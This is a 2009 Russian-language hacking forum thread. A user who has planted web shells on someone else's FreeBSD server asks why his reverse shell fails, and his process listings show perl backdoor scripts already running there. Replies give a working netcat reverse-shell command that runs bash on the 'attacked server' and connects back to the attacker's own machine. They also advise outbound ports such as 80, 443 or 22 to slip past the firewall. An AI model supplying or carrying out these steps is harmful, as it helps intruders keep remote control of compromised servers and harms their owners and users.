Не работает бэк-коннект

Discussion in 'Безопасность и Анонимность' started by InFlame, 18 Jun 2009.

  1. InFlame

    InFlame Banned

    Joined:
    27 Oct 2008
    Messages:
    207
    Likes Received:
    31
    Reputations:
    0
    Имеется сервер, на котором стоит FreeBSD 6.2 и залит шелл. При попытке создания бэк-коннект подключения ничего не происходит. Вот привожу листинг процессов:
    Code:
    [COLOR=White]$ ps aux [/COLOR] 
USER    PID %CPU %MEM   VSZ   RSS  TT  STAT STARTED      TIME COMMAND
root     10 70.1  0.0     0     8  ??  RL    4Jun09 15472:55.28 [idle]
root    928 14.6  0.3  3492  1080 con- S<    4Jun09 3139:23.89 /usr/local/sbin/s
root    592  0.8  0.2  1280   540  ??  SN    4Jun09 207:15.41 nfsd: server (nfs
root     25  0.1  0.0     0     8  ??  WL    4Jun09  83:27.62 [irq12: xl0]
www   57092  0.1  5.6 52660 17792  ??  S<   Wed07PM   5:04.52 /usr/local/sbin/h
root      0  0.0  0.0     0     0  ??  WLs   4Jun09   0:00.00 [swapper]
root      1  0.0  0.0   772    80  ??  SLs   4Jun09   0:00.82 /sbin/init --
root      2  0.0  0.0     0     8  ??  DL    4Jun09   1:40.67 [g_event]
root      3  0.0  0.0     0     8  ??  DL    4Jun09  24:00.74 [g_up]
root      4  0.0  0.0     0     8  ??  DL    4Jun09  26:26.75 [g_down]
root      5  0.0  0.0     0     8  ??  DL    4Jun09   0:00.00 [kqueue taskq]
root      6  0.0  0.0     0     8  ??  DL    4Jun09   0:00.00 [thread taskq]
root      7  0.0  0.0     0     8  ??  DL    4Jun09   0:00.00 [acpi_task_0]
root      8  0.0  0.0     0     8  ??  DL    4Jun09   0:00.00 [acpi_task_1]
root      9  0.0  0.0     0     8  ??  DL    4Jun09   0:00.00 [acpi_task_2]
root     11  0.0  0.0     0     8  ??  WL    4Jun09  42:59.98 [swi1: net]
root     12  0.0  0.0     0     8  ??  WL    4Jun09  52:20.37 [swi4: clock sio]
root     13  0.0  0.0     0     8  ??  WL    4Jun09   0:00.00 [swi3: vm]
root     14  0.0  0.0     0     8  ??  DL    4Jun09   9:09.58 [yarrow]
root     15  0.0  0.0     0     8  ??  WL    4Jun09   0:01.65 [swi6: task queue
root     16  0.0  0.0     0     8  ??  WL    4Jun09   0:00.00 [swi6: Giant task
root     17  0.0  0.0     0     8  ??  WL    4Jun09   0:00.00 [swi5: +]
root     18  0.0  0.0     0     8  ??  WL    4Jun09   0:00.00 [swi2: cambio]
root     19  0.0  0.0     0     8  ??  WL    4Jun09  20:52.93 [irq11: uhci0 uhc
root     20  0.0  0.0     0     8  ??  WL    4Jun09   0:20.06 [irq14: ata0]
root     21  0.0  0.0     0     8  ??  WL    4Jun09   2:07.00 [irq15: ata1]
root     22  0.0  0.0     0     8  ??  DL    4Jun09   0:00.14 [usb0]
root     23  0.0  0.0     0     8  ??  DL    4Jun09   0:00.00 [usbtask]
root     24  0.0  0.0     0     8  ??  DL    4Jun09   0:00.09 [usb1]
root     26  0.0  0.0     0     8  ??  WL    4Jun09   0:00.00 [irq10: atapci2]
root     27  0.0  0.0     0     8  ??  DL    4Jun09   0:08.47 [fdc0]
root     28  0.0  0.0     0     8  ??  WL    4Jun09   0:00.00 [swi0: sio]
root     29  0.0  0.0     0     8  ??  WL    4Jun09   0:00.00 [irq7: ppc0]
root     30  0.0  0.0     0     8  ??  WL    4Jun09   0:00.00 [irq1: atkbd0]
root     31  0.0  0.0     0     8  ??  DL    4Jun09   3:05.08 [pagedaemon]
root     32  0.0  0.0     0     8  ??  DL    4Jun09   0:00.00 [vmdaemon]
root     33  0.0  0.0     0     8  ??  RL    4Jun09  12:52.28 [pagezero]
root     34  0.0  0.0     0     8  ??  DL    4Jun09   0:36.46 [bufdaemon]
root     35  0.0  0.0     0     8  ??  DL    4Jun09  16:48.19 [syncer]
root     36  0.0  0.0     0     8  ??  DL    4Jun09   0:41.44 [vnlru]
root     37  0.0  0.0     0     8  ??  DL    4Jun09   1:42.51 [softdepflush]
root     38  0.0  0.0     0     8  ??  DL    4Jun09   2:42.96 [schedcpu]
root    150  0.0  0.1  1252   456  ??  Is    4Jun09   0:00.00 adjkerntz -i
root    450  0.0  0.0   528    16  ??  Is    4Jun09   0:00.01 /sbin/devd
root    516  0.0  0.2  1400   792  ??  Ss    4Jun09   0:17.77 /usr/sbin/syslogd
root    535  0.0  0.2  1504   624  ??  Ss    4Jun09   0:01.65 /usr/sbin/rpcbind
root    588  0.0  0.2  1484   624  ??  Is    4Jun09   0:00.03 /usr/sbin/mountd
root    590  0.0  0.2  1348   604  ??  INs   4Jun09   0:00.06 nfsd: master (nfs
root    593  0.0  0.2  1280   540  ??  IN    4Jun09   5:26.03 nfsd: server (nfs
root    594  0.0  0.2  1280   540  ??  IN    4Jun09   0:12.07 nfsd: server (nfs
root    596  0.0  0.2  1280   540  ??  IN    4Jun09   0:01.25 nfsd: server (nfs
root    597  0.0  0.2  1280   540  ??  IN    4Jun09   0:00.05 nfsd: server (nfs
root    598  0.0  0.2  1280   540  ??  IN    4Jun09   0:00.04 nfsd: server (nfs
root    599  0.0  0.2  1280   540  ??  IN    4Jun09   0:00.00 nfsd: server (nfs
root    600  0.0  0.2  1280   540  ??  IN    4Jun09   0:00.00 nfsd: server (nfs
root    601  0.0  0.2  1280   540  ??  IN    4Jun09   0:00.00 nfsd: server (nfs
root    602  0.0  0.2  1280   540  ??  IN    4Jun09   0:00.00 nfsd: server (nfs
root    615  0.0  0.3  3436   940  ??  Is    4Jun09   0:00.00 nginx: master pro
www     618  0.0  1.0  5180  3220  ??  R     4Jun09  35:25.44 nginx: worker pro
www     619  0.0  1.1  5548  3608  ??  S     4Jun09  35:27.79 nginx: worker pro
root    645  0.0  0.3  2920  1028  ??  Ss    4Jun09   1:19.20 /usr/sbin/ntpd -c
root    668  0.0  2.0 50296  6232  ??  S<s   4Jun09   1:01.64 /usr/local/sbin/h
www     724  0.0  6.7 53076 21500  ??  S<    4Jun09  66:54.11 /usr/local/sbin/h
www     725  0.0  6.3 52436 20228  ??  S<    4Jun09  67:48.22 /usr/local/sbin/h
www     726  0.0  6.7 53304 21268  ??  S<    4Jun09  66:50.82 /usr/local/sbin/h
www     727  0.0  6.6 53152 21056  ??  S<    4Jun09  66:09.73 /usr/local/sbin/h
www     728  0.0  6.6 53052 21024  ??  S<    4Jun09  66:24.33 /usr/local/sbin/h
root    729  0.0  0.3  3524   904  ??  Is    4Jun09   0:00.01 /usr/sbin/sshd
root    734  0.0  0.6  3484  1764  ??  Ss    4Jun09   1:00.91 sendmail: accepti
smmsp   740  0.0  0.4  3384  1392  ??  Is    4Jun09   0:00.95 sendmail: Queue r
root    746  0.0  0.2  1388   772  ??  Ss    4Jun09   0:21.24 /usr/sbin/cron -s
www     776  0.0  6.2 53060 19640  ??  I<    4Jun09  61:06.90 /usr/local/sbin/h
www     790  0.0  6.5 53328 20876  ??  S<    4Jun09  65:36.43 /usr/local/sbin/h
root    915  0.0  0.0     0     8  ??  WL    4Jun09 141:22.55 [irq5: sbc0]
www    1378  0.0  6.5 53088 20756  ??  S<    4Jun09  64:18.21 /usr/local/sbin/h
www    7277  0.0  6.1 55116 19580  ??  I<    4Jun09  61:36.82 /usr/local/sbin/h
www    7366  0.0  7.7 57360 24412  ??  S<    4Jun09  65:43.98 /usr/local/sbin/h
www   18828  0.0  0.3  1708   836  ??  S<    9:27PM   0:00.00 sh -c ps aux
www   18829  0.0  0.2  1500   784  ??  R<    9:27PM   0:00.00 ps aux
www   57090  0.0  0.0     0     0  ??  Z<   Wed07PM   0:00.00 <defunct>
www   57091  0.0  0.2  2984   736  ??  I<   Wed07PM   0:00.04 /usr/bin/perl /tm
www   59409  0.0  0.0     0     0  ??  Z<   Wed08PM   0:00.00 <defunct>
www   59410  0.0  0.2  2984   736  ??  I<   Wed08PM   0:00.04 /usr/bin/perl /tm
www   59687  0.0  5.5 52456 17636  ??  S<   Wed08PM   5:15.45 /usr/local/sbin/h
root  78996  0.0  0.3  1408   848  ??  I     4:30AM   0:00.00 cron: running job
root  79001  0.0  0.0     0     0  ??  Z     4:30AM   3:06.25 <defunct>
smmsp 80008  0.0  0.6  3392  2044  ??  Is    4:55AM   0:00.04 /usr/sbin/sendmai
mysql 80155  0.0  0.3  1728   820  ??  I<    4:58AM   0:00.02 /bin/sh /usr/loca
mysql 80176  0.0 11.1 59804 35460  ??  S<    4:58AM  57:50.36 /usr/local/libexe
root    966  0.0  0.2  1344   548  v0  Is+   4Jun09   0:00.01 /usr/libexec/gett
root    967  0.0  0.2  1344   548  v1  Is+   4Jun09   0:00.00 /usr/libexec/gett
root    968  0.0  0.2  1344   548  v2  Is+   4Jun09   0:00.00 /usr/libexec/gett
root    969  0.0  0.2  1344   548  v3  Is+   4Jun09   0:00.00 /usr/libexec/gett
root    970  0.0  0.2  1344   548  v4  Is+   4Jun09   0:00.00 /usr/libexec/gett
root    971  0.0  0.2  1344   548  v5  Is+   4Jun09   0:00.00 /usr/libexec/gett
root    972  0.0  0.2  1344   548  v6  Is+   4Jun09   0:00.00 /usr/libexec/gett
root    973  0.0  0.2  1344   548  v7  Is+   4Jun09   0:00.00 /usr/libexec/gett
    Не подскажите, что за файрволл стоит?
    Или какие ещё могут быть варианты подключения?
     
    #1 InFlame, 18 Jun 2009
  2. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    обрезаный у тебя ps -aux, ничё не видно
    какой бекконект ты юзаешь и как запускаешь?
     
    #2 Spyder, 18 Jun 2009
  3. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    на 80ый порт
     
    #3 Tigger, 18 Jun 2009
  4. InFlame

    InFlame Banned

    Joined:
    27 Oct 2008
    Messages:
    207
    Likes Received:
    31
    Reputations:
    0
    Запускал с трёх шеллов (r57, c99, wso2). В netcat прописывал nc -l -p [port]
    Вроде всё правильно, так как с других серваков работает...
    Code:
    [COLOR=White]$ ps ax[/COLOR]
  PID  TT  STAT      TIME COMMAND
    0  ??  WLs    0:00.00 [swapper]
    1  ??  ILs    0:00.83 /sbin/init --
    2  ??  DL     1:40.88 [g_event]
    3  ??  DL    24:02.45 [g_up]
    4  ??  DL    26:28.33 [g_down]
    5  ??  DL     0:00.00 [kqueue taskq]
    6  ??  DL     0:00.00 [thread taskq]
    7  ??  DL     0:00.00 [acpi_task_0]
    8  ??  DL     0:00.00 [acpi_task_1]
    9  ??  DL     0:00.00 [acpi_task_2]
   10  ??  RL   15503:01.11 [idle]
   11  ??  WL    43:05.34 [swi1: net]
   12  ??  WL    52:26.84 [swi4: clock sio]
   13  ??  WL     0:00.00 [swi3: vm]
   14  ??  DL     9:10.52 [yarrow]
   15  ??  WL     0:01.66 [swi6: task queue]
   16  ??  WL     0:00.00 [swi6: Giant taskq]
   17  ??  WL     0:00.00 [swi5: +]
   18  ??  WL     0:00.00 [swi2: cambio]
   19  ??  WL    20:54.40 [irq11: uhci0 uhci*]
   20  ??  WL     0:20.07 [irq14: ata0]
   21  ??  WL     2:07.07 [irq15: ata1]
   22  ??  DL     0:00.14 [usb0]
   23  ??  DL     0:00.00 [usbtask]
   24  ??  DL     0:00.09 [usb1]
   25  ??  WL    83:36.45 [irq12: xl0]
   26  ??  WL     0:00.00 [irq10: atapci2]
   27  ??  DL     0:08.49 [fdc0]
   28  ??  WL     0:00.00 [swi0: sio]
   29  ??  WL     0:00.00 [irq7: ppc0]
   30  ??  WL     0:00.00 [irq1: atkbd0]
   31  ??  DL     3:05.29 [pagedaemon]
   32  ??  DL     0:00.00 [vmdaemon]
   33  ??  RL    12:53.81 [pagezero]
   34  ??  DL     0:36.48 [bufdaemon]
   35  ??  DL    16:49.29 [syncer]
   36  ??  DL     0:41.47 [vnlru]
   37  ??  DL     1:42.61 [softdepflush]
   38  ??  DL     2:43.30 [schedcpu]
  150  ??  Is     0:00.00 adjkerntz -i
  450  ??  Is     0:00.01 /sbin/devd
  516  ??  Ss     0:17.82 /usr/sbin/syslogd -a 192.168.1.0/24
  535  ??  Is     0:01.65 /usr/sbin/rpcbind
  588  ??  Is     0:00.03 /usr/sbin/mountd -r
  590  ??  INs    0:00.06 nfsd: master (nfsd)
  592  ??  SN   207:34.15 nfsd: server (nfsd)
  593  ??  SN     5:26.25 nfsd: server (nfsd)
  594  ??  IN     0:12.07 nfsd: server (nfsd)
  596  ??  IN     0:01.25 nfsd: server (nfsd)
  597  ??  IN     0:00.05 nfsd: server (nfsd)
  598  ??  IN     0:00.04 nfsd: server (nfsd)
  599  ??  IN     0:00.00 nfsd: server (nfsd)
  600  ??  IN     0:00.00 nfsd: server (nfsd)
  601  ??  IN     0:00.00 nfsd: server (nfsd)
  602  ??  IN     0:00.00 nfsd: server (nfsd)
  615  ??  Is     0:00.00 nginx: master process /usr/local/sbin/nginx
  618  ??  R     35:31.99 nginx: worker process (nginx)
  619  ??  R     35:33.60 nginx: worker process (nginx)
  645  ??  Ss     1:19.36 /usr/sbin/ntpd -c /etc/ntp.conf -p /var/run/ntpd.pid
  668  ??  S<s    1:01.77 /usr/local/sbin/httpd
  724  ??  I<    67:04.26 /usr/local/sbin/httpd
  725  ??  S<    67:58.80 /usr/local/sbin/httpd
  726  ??  S<    66:59.74 /usr/local/sbin/httpd
  727  ??  S<    66:20.71 /usr/local/sbin/httpd
  728  ??  I<    66:39.11 /usr/local/sbin/httpd
  729  ??  Is     0:00.01 /usr/sbin/sshd
  734  ??  Ss     1:01.06 sendmail: accepting connections (sendmail)
  740  ??  Is     0:00.95 sendmail: Queue runner@00:30:00 for /var/spool/client
  746  ??  Is     0:21.29 /usr/sbin/cron -s
  776  ??  I<    61:06.90 /usr/local/sbin/httpd
  790  ??  I<    65:45.34 /usr/local/sbin/httpd
  915  ??  LL   141:39.81 [irq5: sbc0]
 1378  ??  S<    64:27.45 /usr/local/sbin/httpd
 7277  ??  I<    61:36.82 /usr/local/sbin/httpd
 7366  ??  S<    65:55.41 /usr/local/sbin/httpd
20604  ??  S<     0:00.00 sh -c ps ax
20605  ??  R<     0:00.00 ps ax
57090  ??  Z<     0:00.00 <defunct>
57091  ??  I<     0:00.04 /usr/bin/perl /tmp/bp.pl 31337 (perl5.8.8)
57092  ??  S<     5:21.52 /usr/local/sbin/httpd
59409  ??  Z<     0:00.00 <defunct>
59410  ??  I<     0:00.04 /usr/bin/perl /tmp/bdpl 11457 (perl5.8.8)
59687  ??  S<     5:26.34 /usr/local/sbin/httpd
78996  ??  I      0:00.00 cron: running job (cron)
79001  ??  Z      3:06.25 <defunct>
80008  ??  Is     0:00.04 /usr/sbin/sendmail -FCronDaemon -odi -oem -oi -t
80155  ??  I<     0:00.02 /bin/sh /usr/local/bin/mysqld_safe --defaults-extra-f
80176  ??  S<    61:13.92 /usr/local/libexec/mysqld --defaults-extra-file=/var/
  966  v0  Is+    0:00.01 /usr/libexec/getty Pc ttyv0
  967  v1  Is+    0:00.00 /usr/libexec/getty Pc ttyv1
  968  v2  Is+    0:00.00 /usr/libexec/getty Pc ttyv2
  969  v3  Is+    0:00.00 /usr/libexec/getty Pc ttyv3
  970  v4  Is+    0:00.00 /usr/libexec/getty Pc ttyv4
  971  v5  Is+    0:00.00 /usr/libexec/getty Pc ttyv5
  972  v6  Is+    0:00.00 /usr/libexec/getty Pc ttyv6
  973  v7  Is+    0:00.00 /usr/libexec/getty Pc ttyv7
  928 con- S<   3145:49.36 /usr/local/sbin/sc_trans_freebsd /usr/local/etc/shout
     
    #4 InFlame, 18 Jun 2009
  5. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    для тебя и для всех остальных напишу в сотый раз
    то что ты делаешь - это не бекконект. nc -l -p ты открываешь порт на сервере, как правило (90%) фаервол блокирует конекты на левые порта
    Бекконет - это когда ты открываешь порт на своём компе (дедике) а на атакуемом сервере конектишься
    для нетката у себя открываешь
    nc -l -v -p 31337
    на атакуемом сервере
    nc [ip дедика] 31337 -e /bin/bash &
     
    #5 Spyder, 18 Jun 2009
  6. razb

    razb Active Member

    Joined:
    24 Mar 2009
    Messages:
    658
    Likes Received:
    133
    Reputations:
    18
    Сделай бк на 80, 22 etc. порты, а то исходящие на высокие порты iptables видимо блочит
     
    #6 razb, 18 Jun 2009
  7. InFlame

    InFlame Banned

    Joined:
    27 Oct 2008
    Messages:
    207
    Likes Received:
    31
    Reputations:
    0
    Я знаю что такое бэкконнект ;) Я итак на своём компе порт слушаю (сайт в локалке). А с сервака ни на какие порты ко мне не хочет коннектиться.
    А из приведённых выше процессов не видно какой файрволл стоит?
     
    #7 InFlame, 18 Jun 2009
    Last edited: 18 Jun 2009
  8. razb

    razb Active Member

    Joined:
    24 Mar 2009
    Messages:
    658
    Likes Received:
    133
    Reputations:
    18
    *linux -> iptables
    *bsd -> ipfw
     
    #8 razb, 18 Jun 2009
  9. InFlame

    InFlame Banned

    Joined:
    27 Oct 2008
    Messages:
    207
    Likes Received:
    31
    Reputations:
    0
    Почему тогда в процессах не видно ipfw?
     
    #9 InFlame, 19 Jun 2009
  10. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    697
    Likes Received:
    404
    Reputations:
    134
    Если ты откроешь бекконект так, как написал паучок)) ,то все получится..главное что б у тебя был внешний ип. По своему опыту могу посоветывать порт 443, сомневаюсь что он у тебя занят)
    вот только в данном случае советую запускать nc без "-e /bin/bash &"
     
    #10 $n@ke, 19 Jun 2009
  11. neval

    neval Elder - Старейшина

    Joined:
    13 Dec 2006
    Messages:
    457
    Likes Received:
    116
    Reputations:
    23
    ipfw - это утилита управления файерволом


    ipfw show сделай
     
    #11 neval, 20 Jun 2009
    1 person likes this.
  12. InFlame

    InFlame Banned

    Joined:
    27 Oct 2008
    Messages:
    207
    Likes Received:
    31
    Reputations:
    0
    Ничего не выводит.
     
    #12 InFlame, 20 Jun 2009
(You must log in or sign up to post here.)